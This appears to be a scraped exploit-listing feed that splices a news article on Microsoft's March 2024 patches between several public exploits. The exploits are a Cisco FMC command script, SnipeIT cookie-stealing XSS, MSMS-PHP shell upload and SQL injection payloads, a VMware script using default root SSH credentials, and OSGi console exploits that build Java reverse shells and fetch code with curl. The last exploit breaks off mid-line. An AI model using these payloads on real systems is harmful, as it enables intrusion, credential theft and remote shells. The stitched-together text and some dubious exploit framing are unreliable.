Cisco Firepower Management Center suffers from an authenticated remote command execution vulnerability. Many versions spanning the 7.x.x.x and 6.x.x.x branches are affected.

# Exploit Title: [Cisco Firepower Management Center]  
# Google Dork: [non]  
# Date: [12/06/2023]  
# Exploit Author: [Abdualhadi khalifa](https://twitter.com/absholi_ly)  
# Version: [6.2.3.18", "6.4.0.16", "6.6.7.1]  
# CVE : [CVE-2023-20048]

import requests  
import json

# set the variables for the URL, username, and password for the FMC web services interface  
fmc_url = "https://fmc.example.com"  
fmc_user = "admin"  
fmc_pass = "cisco123"

# create a requests session to handle cookies and certificate verification  
session = requests.Session()  
session.verify = False

# send a POST request to the /api/fmc_platform/v1/auth/generatetoken endpoint to get the access token and refresh token  
token_url = fmc_url + "/api/fmc_platform/v1/auth/generatetoken"  
response = session.post(token_url, auth=(fmc_user, fmc_pass))

# check the response status and extract the access token and refresh token from the response headers  
# set the access token as the authorization header for the subsequent requests  
try:  
    if response.status_code == 200:  
        access_token = response.headers["X-auth-access-token"]  
        refresh_token = response.headers["X-auth-refresh-token"]  
        session.headers["Authorization"] = access_token  
    else:  
        print("Failed to get tokens, status code: " + str(response.status_code))  
        exit()  
except Exception as e:  
    print(e)  
    exit()

# set the variable for the domain id  
# change this to your domain id  
domain_id = "e276abec-e0f2-11e3-8169-6d9ed49b625f"

# send a GET request to the /api/fmc_config/v1/domain/{DOMAIN_UUID}/devices/devicerecords endpoint to get the list of devices managed by FMC  
devices_url = fmc_url + "/api/fmc_config/v1/domain/" + domain_id + "/devices/devicerecords"  
response = session.get(devices_url)

# check the response status and extract the data as a json object  
try:  
    if response.status_code == 200:  
        data = response.json()  
    else:  
        print("Failed to get devices, status code: " + str(response.status_code))  
        exit()  
except Exception as e:  
    print(e)  
    exit()

# parse the data to get the list of device names and URLs  
devices = []  
for item in data["items"]:  
    device_name = item["name"]  
    device_url = item["links"]["self"]  
    devices.append((device_name, device_url))

# loop through the list of devices and send a GET request to the URL of each device to get the device details  
for device in devices:  
    device_name, device_url = device  
    response = session.get(device_url)

    # check the response status and extract the data as a json object  
    try:  
        if response.status_code == 200:  
            data = response.json()  
        else:  
            print("Failed to get device details, status code: " + str(response.status_code))  
            continue  
    except Exception as e:  
        print(e)  
        continue

    # parse the data to get the device type, software version, and configuration URL  
    device_type = data["type"]  
    device_version = data["metadata"]["softwareVersion"]  
    config_url = data["metadata"]["configURL"]

    # check if the device type is FTD and the software version is vulnerable to the CVE-2023-20048 vulnerability  
    # use the values from the affected products section in the security advisory  
    if device_type == "FTD" and device_version in ["6.2.3.18", "6.4.0.16", "6.6.7.1"]:  
        print("Device " + device_name + " is vulnerable to CVE-2023-20048")

        # create a list of commands that you want to execute on the device  
        commands = ["show version", "show running-config", "show interfaces"]  
        device_id = device_url.split("/")[-1]

        # loop through the list of commands and send a POST request to the /api/fmc_config/v1/domain/{DOMAIN_UUID}/devices/devicerecords/{DEVICE_ID}/operational/command/{COMMAND} endpoint to execute each command on the device  
        # replace {DOMAIN_UUID} with your domain id, {DEVICE_ID} with your device id, and {COMMAND} with the command you want to execute  
        for command in commands:  
            command_url = fmc_url + "/api/fmc_config/v1/domain/" + domain_id + "/devices/devicerecords/" + device_id + "/operational/command/" + command  
            response = session.post(command_url)

            # check the response status and extract the data as a json object  
            try:  
                if response.status_code == 200:  
                    data = response.json()  
                else:  
                    print("Failed to execute command, status code: " + str(response.status_code))  
                    continue  
            except Exception as e:  
                print(e)  
                continue

            # parse the data to get the result of the command execution and print it  
            result = data["result"]  
            print("Command: " + command)  
            print("Result: " + result)

    else:  
        print("Device " + device_name + " is not vulnerable to CVE-2023-20048")

Cisco Firepower Management Center Remote Command Execution

Microsoft patched 61 vulnerabilities in the March 2024 Patch Tuesday round, including two critical flaws in Hyper-V.

The March 2024 Patch Tuesday update includes patches for 61 Microsoft vulnerabilities. Only two of the vulnerabilities are rated critical and both of these are found in Windows Hyper-V.

Hyper-V is a hardware virtualization product that allows you to run multiple operating systems as virtual machines (VMs) on Windows. A virtual machine is a computer program that emulates a physical computer. A physical “host” computer can run multiple separate “guest” VMs that are isolated from each other, and from the host. The physical resources of the host are allocated to the VMs by a software layer called the hypervisor, which acts an intermediary between the host and guests.

The Common Vulnerabilities and Exposures (CVE) database lists publicly disclosed computer security flaws. The Hyper-V CVEs patched in this round of updates are:

CVE-2024-21407 is a Windows Hyper-V Remote Code Execution (RCE) vulnerability with a CVSS score of 8.1 out of 10. Microsoft says exploitation is less likely since this vulnerability would require an authenticated attacker on a guest to send specially crafted file operation requests to hardware resources on the VM which could result in remote code execution on the host server.

This means the attacker would need a good deal of information about the specific environment, and to take additional actions prior to exploitation to prepare the target environment.

CVE-2024-21408 is a Windows Hyper-V Denial of Service (DOS) vulnerability with a CVSS score of 5.5 out of 10. This means an attacker could target a host machine from a guest and cause it to crash or stop functioning. However, Microsoft did not provide any additional details on how this DOS could occur.

The attention for Hyper-V is remarkable since only a week earlier, VMware released security updates to fix critical sandbox escape vulnerabilities in VMware ESXi, Workstation, Fusion, and Cloud Foundation. VMware ESXi and Hyper-V are both designed to handle large-scale virtualization deployments.

Another vulnerability worth mentioning is CVE-2024-21334, which has a CVSS score of 9.8 out of 10. It’s an Open Management Infrastructure (OMI) RCE vulnerability that affects System Center Operations Manager (SCOM). SCOM is a set of tools in Microsoft’s System Center for infrastructure monitoring and application performance management. A remote, unauthenticated attacker could exploit this vulnerability by accessing the OMI instance from the internet and sending specially crafted requests to trigger a use-after-free vulnerability.

OMI is an open source technology for environment management software products for Linux and Unix-based systems. The OMI project was set up to implement standards-based management so that every device in the world can be managed in a clear, consistent, and coherent way.

Use-after-free vulnerabilities are the result of the incorrect use of dynamic memory during a program’s operation. If, after freeing a memory location, a program does not clear the pointer to that memory, an attacker can exploit the error to manipulate the program. Referencing memory after it has been freed can cause a program to crash, use unexpected values, or execute code.

Microsoft states that if the Linux machines do not need network listening, OMI incoming ports can be disabled. In other cases, customers running affected versions of SCOM (System Center Operations Manager 2019 and 2022) should update to OMI version 1.8.1-0.

**Other vendors**

Other vendors have synchronized their periodic updates with Microsoft. Here are few major ones that you may find in your environment.

**Adobe** has released security updates to address vulnerabilities in several products:

*   Adobe Experience Manager
*   Adobe Premiere Pro
*   Adobe ColdFusion
*   Adobe Bridge
*   Adobe Lightroom
*   Adobe Animate

The **Android** Security Bulletin for February contains details of security vulnerabilities for patch level 2024-03-05 or later.

**Apple** has released a security update for iOS and iPadOS to patch two zero-day vulnerabilities

**SAP** has released its March 2024 Patch Day updates.

**We don’t just report on vulnerabilities—we identify them, and prioritize action.**

Cybersecurity risks should never spread beyond a headline. Keep vulnerabilities in tow by using ThreatDown Vulnerability and Patch Management.

 Microsoft Patch Tuesday March 2024 includes critical Hyper-V flaws 

SnipeIT version 6.2.1 suffers from a persistent cross site scripting vulnerability.

    Exploit Title: SnipeIT 6.2.1 - Stored Cross Site ScriptingDate: 06-Oct-2023Exploit Author: Shahzaib Ali KhanVendor Homepage: https://snipeitapp.comSoftware Link: https://github.com/snipe/snipe-it/releases/tag/v6.2.1Version: 6.2.1Tested on: Windows 11 22H2 and Ubuntu 20.04CVE: CVE-2023-5452Description: SnipeIT 6.2.1 is affected by a stored cross-site scripting(XSS) feature that allows attackers to execute JavaScript commands. Thelocation endpoint was vulnerable.Steps to Reproduce:1. Login as a standard user [non-admin] > Asset page > List All2. Click to open any asset > Edit Asset3. Create new location and add the payload:<script>alert(document.cookie)</script>4. Now login to any other non-admin or admin > Asset page > List All5. Open the same asset of which you can change the location and the payloadwill get executed.POC Request:POST /api/v1/locations HTTP/1.1Host: localhostContent-Length: 118Accept: */*X-CSRF-TOKEN: CDJkvGNWzFKFueeNx0AQMJIhhXJGZmKG1SFeVEGVX-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/117.0.5938.63 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Origin: http://localhostReferer: http://localhost/hardware/196/editAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: snipeit_session=AHw3ARN6pdg90xU4ovG1FBZywycKPLIxjTUfmELO;assetsListingTable.bs.table.cardView=false; laravel_token=eyJpdiI6IitpM1RXVEVEVGNLZzRTd28wYmhZblE9PSIsInZhbHVlIjoickJocmNYTzNOS3JYdkdhSmpJME1GRmJYMi9DUnVkaStDTzBnbHZDVG1xNVAvbTA5cjJHM1FTbi95SEVzNmNnNzdKNHY5em5pK3ZjQ2F3VnB6RnhJRCs4NkV6NW16RnRWb3M0cXBuT2ZpZExoQ3JrN1VIVHB3cWV5NUtBRWZ4OXBsdEx4R0hSeElLV1BEbWk2WGxiWEBOMDg5cGFySj1rSnENckx3bXg2Qi9KQzFvNGJJTktjTVUw0EI4YVNMd2UxdW1TelBDV1ByUk9yeTFOUDR1cS9SV2tFRi9LOG1iZGVweUxJdGhHTXRLSnFvTU82QVIvREphS215bkRtKzM5M1RVQ21nVENsT1M1Mn1FUT1TbFkOVDVPbHd4a3BFQW1YQkY3NFR2bzRQSGZIelppa001MGYvSmFrbXVGWHpV0FMiLCJtYWMi0iJjZjMwMmQ4ZTB1NmM4MDU5YzU4MTYzZTgxNTcx0WEwYmM2Y2EyMmRlYzZhMmE2ZjI1NzIxYjc4NmIxNjRiOWM5IiwidGFnIjoiIn0%3D;XSRF-TOKEN=eyJpdiI6IjNmMVpNUEpDNCtpV0pHKOczZDRSUmc9PSIsInZhbHVlIjoiWXYvZkY2bTk4MONsUUFZQjZiVWtPdm1JRE1WWmpBd2tsZWNJblgxZWg3dONYL2x0Zkxib3N5Y1N5YmRYVm1XUm91N3pES1F1bHFWMEV1Y2xsZ1VqZ1FYdmdYcjJRZXZMZG9NYmpWY2htL2tPdXNBQUdEbjVHSEVjV2tzKOpYelEiLCJtYWMi0iI1YzhkNmQ2NDAxNmZkYTQ1NzVhZmI5OGY3ODA3MDkOOTc4ZWVhYmMiZWIYMjZhZGZiZWI5MjMOMGJjZDBkNzU4IiwidGFnIjoiIn0%3DConnection: closename=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&city=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&country=Thanks,Shahzaib Ali Khan

SnipeIT 6.2.1 Cross Site Scripting

MSMS-PHP version 1.0 suffers from a remote shell upload vulnerability.

    ## Title: MSMS-PHP (by: oretnom23 ) v1.0 File Upload - RCE browser using## Author: nu11secur1ty## Date: 03/13/2024## Vendor: https://github.com/oretnom23## Software: https://www.sourcecodester.com/php/14924/online-mobile-store-management-system-using-php-free-source-code.html## Reference: https://portswigger.net/web-security/file-upload## Description:The upload function and id=cimg parameter are not sanitizing correctly!The attacker can upload any PHP file which he can execute directly onthe server!STATUS: HIGH-CrITICAL Vulnerability[+]Payload:```POSTPOST /mobile_store/classes/SystemSettings.php?f=update_settings HTTP/1.1Host: localhostContent-Length: 6318sec-ch-ua: "Not(A:Brand";v="24", "Chromium";v="122"Accept: application/json, text/javascript, */*; q=0.01Content-Type: multipart/form-data;boundary=----WebKitFormBoundarypV7nBYU4nAonvWelX-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112Safari/537.36sec-ch-ua-platform: "Windows"Origin: http://localhostSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://localhost/mobile_store/admin/?page=system_infoAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=b6i4kegv7jonjlu44gtuo8i4dgConnection: close------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="name"Mobile Store Management System - PHP------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="short_name"MSMS-PHP------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="about_us"<p style="text-align: center; margin-right: 0px; margin-bottom: 0px;margin-left: 0px; padding: 0px; font-family: DauphinPlain; font-size:70px; line-height: 90px;">About Us</p><hr style="margin: 0px; padding:0px; clear: both; border-top: 0px; height: 1px; background-image:linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.75),rgba(0, 0, 0, 0));"><div id="Content" style="margin: 0px; padding:0px; position: relative;"><div id="bannerL" style="margin: 0px 0px 0px-160px; padding: 0px; position: sticky; top: 20px; width: 160px;height: 10px; float: left; text-align: right; color: rgb(0, 0, 0);font-family: "Open Sans", Arial, sans-serif; font-size: 14px;background-color: rgb(255, 255, 255);"></div><div id="bannerR"style="margin: 0px -160px 0px 0px; padding: 0px; position: sticky;top: 20px; width: 160px; height: 10px; float: right; color: rgb(0, 0,0); font-family: "Open Sans", Arial, sans-serif; font-size: 14px;background-color: rgb(255, 255, 255);"></div><div class="boxed"style="margin: 10px 28.7969px; padding: 0px; clear: both; color:rgb(0, 0, 0); font-family: "Open Sans", Arial, sans-serif; font-size:14px; text-align: center; background-color: rgb(255, 255, 255);"><divid="lipsum" style="margin: 0px; padding: 0px; text-align:justify;"></div></div></div><p style="margin-right: 0px;margin-bottom: 15px; margin-left: 0px; padding: 0px;">Lorem ipsumdolor sit amet, consectetur adipiscing elit. Nullam non ultricestortor. Sed at ligula non lectus tempor bibendum a nec ante. Maecenasiaculis vitae nisi eu dictum. Duis sit amet enim arcu. Etiam blanditvulputate magna, non lobortis velit pharetra vel. Morbi sollicitudinlorem sed augue suscipit, eu commodo tortor vulputate. Interdum etmalesuada fames ac ante ipsum primis in faucibus. Pellentesquehabitant morbi tristique senectus et netus et malesuada fames acturpis egestas. Praesent eleifend interdum est, at gravida eratmolestie in. Vestibulum et consectetur dui, ac luctus arcu. Curabituret viverra elit. Cras ac eleifend ipsum, ac suscipit leo. Vivamusporttitor ac risus eu ultricies. Morbi malesuada mi vel luctussagittis. Ut vestibulum porttitor est, id rutrum libero. Mauris atlacus vehicula, aliquam purus quis, pharetra lorem.</p><pstyle="margin-right: 0px; margin-bottom: 15px; margin-left: 0px;padding: 0px;">Proin consectetur massa ut quam molestie porta. Donecsit amet ligula odio. Class aptent taciti sociosqu ad litora torquentper conubia nostra, per inceptos himenaeos. Morbi ex sapien, pulvinarac arcu at, luctus scelerisque nibh. In dolor velit, pellentesque eublandit a, mollis ac neque. Fusce tortor lectus, aliquam et eleifendid, aliquet ut libero. Nunc scelerisque vulputate turpis quisvolutpat. Vivamus malesuada sem in dapibus aliquam. Vestibulumimperdiet, nulla vitae pharetra pretium, magna felis placerat libero,quis tincidunt felis diam nec nisi. Sed scelerisque ullamcorpercursus. Suspendisse posuere, velit nec rhoncus cursus, urna sapienconsectetur est, et lacinia odio leo nec massa. Nam vitae nunc vitaetortor vestibulum consequat ac quis risus. Sed finibus pharetra orci,id vehicula tellus eleifend sit amet.</p><p style="margin-right: 0px;margin-bottom: 15px; margin-left: 0px; padding: 0px;">Morbi id antevel velit mollis egestas. Suspendisse pretium sem urna, vitae placeratturpis cursus faucibus. Ut dignissim molestie blandit. Phaselluspulvinar, eros id ultricies mollis, lectus velit viverra mi, atvenenatis velit purus id nisi. Duis eu massa lorem. Curabitur sed nibhfelis. Donec faucibus, nulla at faucibus blandit, mi justo efficiturdui, non mattis nisl purus non lacus. Maecenas vel congue tellus, inconvallis nisi. Curabitur faucibus interdum massa, eu facilisis ligulapretium quis. Nunc eleifend orci nec volutpat tincidunt.</p><pstyle="margin-right: 0px; margin-bottom: 15px; margin-left: 0px;padding: 0px;">Ut et urna sapien. Nulla lacinia sagittis felis idcursus. Etiam eget lacus quis enim aliquet dignissim. Nulla vel elitultrices, venenatis quam sed, rutrum magna. Pellentesque ultricies nonlorem hendrerit vestibulum. Maecenas lacinia pharetra nisi, atpharetra nunc placerat nec. Maecenas luctus dolor in leo malesuada,vel aliquet metus sollicitudin. Curabitur sed pellentesque sem, intincidunt mi. Aliquam sodales aliquam felis, eget tristique felisdictum at. Proin leo nisi, malesuada vel ex eu, dictum pellentesquemauris. Quisque sit amet varius augue.</p><p style="margin-right: 0px;margin-bottom: 15px; margin-left: 0px; padding: 0px;">Sed quisimperdiet est. Donec lobortis tortor id neque tempus, vel faucibuslorem mollis. Fusce ut sollicitudin risus. Aliquam iaculis tristiquenunc vel feugiat. Sed quis nulla non dui ornare porttitor eu vitaenisi. Curabitur at quam ut libero convallis mattis vel eget mauris.Vivamus vitae lectus ligula. Nulla facilisi. Vivamus tristique maximusnulla, vel mollis felis blandit posuere. Curabitur mi risus, rutrumnon magna at, molestie gravida magna. Aenean neque sapien, volutpat aullamcorper nec, iaculis quis est.</p>------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="files"; filename=""Content-Type: application/octet-stream------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="privacy_policy"<p>Sample Privacy Policy<br></p>------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="files"; filename=""Content-Type: application/octet-stream------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="img"; filename="info.php"Content-Type: application/octet-stream<?php  phpinfo();?>------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="cover"; filename=""Content-Type: application/octet-stream------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="banners[]"; filename=""Content-Type: application/octet-stream------WebKitFormBoundarypV7nBYU4nAonvWel--```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2024/MSMS-PHP(by%3Aoretnom23)v1.0/FU)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/03/msms-php-by-oretnom23-v10-file-upload.html)## Time spent:00:05:00

MSMS-PHP 1.0 Shell Upload

MSMS-PHP version 1.0 suffers from a remote SQL injection vulnerability.

    ## Title: MSMS-PHP (by: oretnom23 ) v1.0 Multiple-SQLi## Author: nu11secur1ty## Date: 03/13/2024## Vendor: https://github.com/oretnom23## Software: https://www.sourcecodester.com/php/14924/online-mobile-store-management-system-using-php-free-source-code.html## Reference: https://portswigger.net/web-security/sql-injection## Description:This issue was generated by the BCheck: puncher_SQLi_bypass_authentication.There is a change in response when nu11secur1ty' or 1=1# is injected.Potential SQLi detected. Please confirm it manually after you checkthe POST, GET, or other requests... The payload from thepuncher_SQLi_bypass_authentication module was submitted successfullyafter the test. The `search` parameter is vulnerable for Multiple SQLiattacks. The attacker can get all information from the system by usingthis vulnerability!STATUS: HIGH- Vulnerability[+]Payload:```mysql---Parameter: search (GET)    Type: error-based    Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)    Payload: p=products&search=-9068') OR 1 GROUP BYCONCAT(0x716b717671,(SELECT (CASE WHEN (4449=4449) THEN 1 ELSE 0END)),0x71706b7a71,FLOOR(RAND(0)*2)) HAVING MIN(0)#    Type: UNION query    Title: MySQL UNION query (random number) - 9 columns    Payload: p=products&search=-7515') UNION ALL SELECT2313,2313,2313,2313,CONCAT(0x716b717671,0x6e73537a656d74516c6d6751704b58725771474449755548546a50537054586f6656546a78447941,0x71706b7a71),2313,2313,2313,2313#---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2024/MSMS-PHP(by%3Aoretnom23)v1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/03/msms-php-by-oretnom23-v10-multiple-sqli.html)## Time spend:00:15:00

MSMS-PHP 1.0 SQL Injection

VMware Cloud Director version 10.5 suffers from an authentication bypass vulnerability.

    # Exploit Title: [VMware Cloud Director | Bypass identity verification]# Google Dork: [non]# Date: [12/06/2023]# Exploit Author: [Abdualhadi khalifa](https://twitter.com/absholi_ly)# Version: [10.5]# CVE : [CVE-2023-34060]import requestsimport paramikoimport subprocessimport socketimport argparseimport threading# Define a function to check if a port is opendef is_port_open(ip, port):    # Create a socket object    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)    # Set the timeout to 1 second    s.settimeout(1)    # Try to connect to the port    try:        s.connect((ip, port))        # The port is open        return True    except:        # The port is closed        return False    finally:        # Close the socket        s.close()# Define a function to exploit a vulnerable devicedef exploit_device(ip, port, username, password, command):    # Create a ssh client object    client = paramiko.SSHClient()    # Set the policy to accept any host key    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())    # Connect to the target using the credentials    client.connect(ip, port, "root", "vmware", allow_agent=False, look_for_keys=False)    # Execute the command and get the output    stdin, stdout, stderr = client.exec_command(command)    # Print the output    print(f"The output of the command {command} on the device {ip}:{port} is: {stdout.read().decode()}")    # Close the ssh connection    client.close()# Parse the arguments from the userparser = argparse.ArgumentParser(description="A Python program to detect and exploit the CVE-2023-34060 vulnerability in VMware Cloud Director")parser.add_argument("ip", help="The target IP address")parser.add_argument("-p", "--ports", nargs="+", type=int, default=[22, 5480], help="The target ports to check")parser.add_argument("-u", "--username", default="root", help="The username for ssh")parser.add_argument("-w", "--password", default="vmware", help="The password for ssh")parser.add_argument("-c", "--command", default="hostname", help="The command to execute on the vulnerable devices")args = parser.parse_args()# Loop through the ports and check for the vulnerabilityfor port in args.ports:    # Check if the port is open    if is_port_open(args.ip, port):        # The port is open, send a GET request to the port and check the status code        response = requests.get(f"http://{args.ip}:{port}")        if response.status_code == 200:            # The port is open and vulnerable            print(f"Port {port} is vulnerable to CVE-2023-34060")            # Create a thread to exploit the device            thread = threading.Thread(target=exploit_device, args=(args.ip, port, args.username, args.password, args.command))            # Start the thread            thread.start()        else:            # The port is open but not vulnerable            print(f"Port {port} is not vulnerable to CVE-2023-34060")    else:        # The port is closed        print(f"Port {port} is closed")

VMware Cloud Director 10.5 Authentication Bypass

OSGi versions 3.7.2 and below suffer from a remote code execution vulnerability.

    #!/usr/bin/python# Exploit Title: [OSGi v3.7.2 Console RCE]# Date: [2023-07-28]# Exploit Author: [Andrzej Olchawa, Milenko Starcik,#                  VisionSpace Technologies GmbH]# Exploit Repository:#           [https://github.com/visionspacetec/offsec-osgi-exploits.git]# Vendor Homepage: [https://eclipse.dev/equinox]# Software Link: [https://archive.eclipse.org/equinox/]# Version: [3.7.2 and before]# Tested on: [Linux kali 6.3.0-kali1-amd64]# License: [MIT]## Usage:# python exploit.py --help## Examples:# python exploit.py --rhost=localhost --rport=1337 --lhost=localhost \#   --lport=4444## python exploit.py --rhost=localhost --rport=1337 --payload= \#   "curl http://192.168.100.100/osgi_test""""This is an exploit that allows to open a reverse shell connection fromthe system running OSGi v3.7.2 and earlier."""import argparseimport base64import socketdef parse():    """    This fnction is used to parse and return command-line arguments.    """    parser = argparse.ArgumentParser(        prog="OSGi-3.7.2-console-RCE",        description="This tool will let you open a reverse shell from the "                    "system that is running OSGi with the '-console' "                    "option in version 3.7.2 (or before).",        epilog="Happy Hacking! :)",    )    parser.add_argument("--rhost", dest="rhost",                        help="remote host", type=str, required=True)    parser.add_argument("--rport", dest="rport",                        help="remote port", type=int, required=True)    parser.add_argument("--lhost", dest="lhost",                        help="local host", type=str, required=False)    parser.add_argument("--lport", dest="lport",                        help="local port", type=int, required=False)    parser.add_argument("--payload", dest="custom_payload",                        help="custom payload", type=str, required=False)    parser.add_argument("--version", action="version",                        version="%(prog)s 0.1.0")    args = parser.parse_args()    if args.custom_payload and (args.lhost or args.lport):        parser.error(            "either --payload or both --lport and --rport are required.")    return argsdef generate_payload(lhost, lport, custom_payload):    """    This function generates the whole payload ready for the delivery.    """    payload = ""    if custom_payload:        payload = custom_payload        print("(*) Using custom payload.")    elif lhost and lport:        payload = \            "echo 'import java.io.IOException;import java.io.InputStream;" \            "import java.io.OutputStream;import java.net.Socket;class Rev" \            "Shell {public static void main(String[] args) throws Excepti" \            "on { String host=\"%s\";int port=%s;String cmd=\"sh\";Proces" \            "s p=new ProcessBuilder(cmd).redirectErrorStream(true).start(" \            ");Socket s=new Socket(host,port);InputStream pi=p.getInputSt" \            "ream(),pe=p.getErrorStream(), si=s.getInputStream();OutputSt" \            "ream po=p.getOutputStream(), so=s.getOutputStream();while(!s" \            ".isClosed()){while(pi.available()>0)so.write(pi.read());whil" \            "e(pe.available()>0)so.write(pe.read());while(si.available()>" \            "0)po.write(si.read());so.flush();po.flush();Thread.sleep(50)" \            ";try {p.exitValue();break;}catch (Exception e){}};p.destroy(" \            ");s.close();}}' > RevShell.java ; java ./RevShell.java" % (                lhost, lport)        print("(+) Using Java reverse shell payload.")    bash_payload = b"bash -c {echo,%s}|{base64,-d}|{bash,-i}" % (        base64.b64encode(payload.encode()))    wrapped_payload = b"fork \"%s\"\n" % (bash_payload)    return wrapped_payloaddef deliver_payload(rhost, rport, payload):    """    This function connects to the target host and delivers the payload.    It returns True if successful; False otherwise.    """    print("(*) Sending payload...")    try:        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)        sock.connect((rhost, rport))        sock.send(payload)        sock.close()    except socket.error as err:        print(f"(-) Could not deliver the payload to {rhost}:{rport}!")        print(err)        return False    return Truedef main(args):    """    Main function.    """    payload = generate_payload(args.lhost, args.lport, args.custom_payload)    success = deliver_payload(args.rhost, args.rport, payload)    if success:        print("(+) Done.")    else:        print("(-) Finished with errors.")if __name__ == "__main__":    main(parse())

OSGi 3.7.2 Remote Code Execution

OSGi versions 3.8 through 3.18 suffer from a remote code execution vulnerability.

    #!/usr/bin/python# Exploit Title: [OSGi v3.8-3.18 Console RCE]# Date: [2023-07-28]# Exploit Author: [Andrzej Olchawa, Milenko Starcik,#                  VisionSpace Technologies GmbH]# Exploit Repository:#           [https://github.com/visionspacetec/offsec-osgi-exploits.git]# Vendor Homepage: [https://eclipse.dev/equinox]# Software Link: [https://archive.eclipse.org/equinox/]# Version: [3.8 - 3.18]# Tested on: [Linux kali 6.3.0-kali1-amd64]# License: [MIT]## Usage:# python exploit.py --help## Example:# python exploit.py --rhost=192.168.0.133 --rport=1337 --lhost=192.168.0.100 \#                                                      --lport=4444"""This is an exploit that allows to open a reverse shell connection fromthe system running OSGi v3.8-3.18 and earlier."""import argparseimport socketimport sysimport threadingfrom functools import partialfrom http.server import BaseHTTPRequestHandler, HTTPServer# Stage 1 of the handshake messageHANDSHAKE_STAGE_1 = \    b"\xff\xfd\x01\xff\xfd" \    b"\x03\xff\xfb\x1f\xff" \    b"\xfa\x1f\x00\x74\x00" \    b"\x37\xff\xf0\xff\xfb" \    b"\x18"# Stage 2 of the handshake messageHANDSHAKE_STAGE_2 = \    b"\xff\xfa\x18\x00\x58" \    b"\x54\x45\x52\x4d\x2d" \    b"\x32\x35\x36\x43\x4f" \    b"\x4c\x4f\x52\xff\xf0"# The buffer of this size is enough to handle the telnet handshakeBUFFER_SIZE = 2 * 1024class HandlerClass(BaseHTTPRequestHandler):    """    This class overrides the BaseHTTPRequestHandler. It provides a specific    functionality used to deliver a payload to the target host.    """    _lhost: str    _lport: int    def __init__(self, lhost, lport, *args, **kwargs):        self._lhost = lhost        self._lport = lport        super().__init__(*args, **kwargs)    def _set_response(self):        self.send_response(200)        self.send_header("Content-type", "text/html")        self.end_headers()    def do_GET(self):  # pylint: disable=C0103        """        This method is responsible for the playload delivery.        """        print("Delivering the payload...")        self._set_response()        self.wfile.write(generate_revshell_payload(            self._lhost, self._lport).encode('utf-8'))        raise KeyboardInterrupt    def log_message(self, format, *args):  # pylint: disable=W0622        """        This method redefines a built-in method to suppress        BaseHTTPRequestHandler log messages.        """        returndef generate_revshell_payload(lhost, lport):    """    This function generates the Revershe Shell payload that will    be executed on the target host.    """    payload = \        "import java.io.IOException;import java.io.InputStream;" \        "import java.io.OutputStream;import java.net.Socket;" \        "class RevShell {public static void main(String[] args) " \        "throws Exception { String host=\"%s\";int port=%d;" \        "String cmd=\"sh\";Process p=new ProcessBuilder(cmd)." \        "redirectErrorStream(true).start();Socket s=new Socket(host,port);" \        "InputStream pi=p.getInputStream(),pe=p.getErrorStream(), " \        "si=s.getInputStream();OutputStream po=p.getOutputStream()," \        "so=s.getOutputStream();while(!s.isClosed()){while(pi.available()" \        ">0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());" \        "while(si.available()>0)po.write(si.read());so.flush();po.flush();" \        "Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};" \        "p.destroy();s.close();}}\n" % (            lhost, lport)    return payloaddef run_payload_delivery(lhost, lport):    """    This function is responsible for payload delivery.    """    print("Setting up the HTTP server for payload delivery...")    handler_class = partial(HandlerClass, lhost, lport)    server_address = ('', 80)    httpd = HTTPServer(server_address, handler_class)    try:        print("[+] HTTP server is running.")        httpd.serve_forever()    except KeyboardInterrupt:        print("[+] Payload delivered.")    except Exception as err:  # pylint: disable=broad-except        print("[-] Failed payload delivery!")        print(err)    finally:        httpd.server_close()def generate_stage_1(lhost):    """    This function generates the stage 1 of the payload.    """    stage_1 = b"fork \"curl http://%s -o ./RevShell.java\"\n" % (        lhost.encode()    )    return stage_1def generate_stage_2():    """    This function generates the stage 2 of the payload.    """    stage_2 = b"fork \"java ./RevShell.java\"\n"    return stage_2def establish_connection(rhost, rport):    """    This function creates a socket and establishes the connection    to the target host.    """    print("[*] Connecting to OSGi Console...")    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)    sock.connect((rhost, rport))    print("[+] Connected.")    return sockdef process_handshake(sock):    """    This function process the handshake with the target host.    """    print("[*] Processing the handshake...")    sock.recv(BUFFER_SIZE)    sock.send(HANDSHAKE_STAGE_1)    sock.recv(BUFFER_SIZE)    sock.send(HANDSHAKE_STAGE_2)    sock.recv(BUFFER_SIZE)    sock.recv(BUFFER_SIZE)def deliver_payload(sock, lhost):    """    This function executes the first stage of the exploitation.    It triggers the payload delivery mechanism to the target host.    """    stage_1 = generate_stage_1(lhost)    print("[*] Triggering 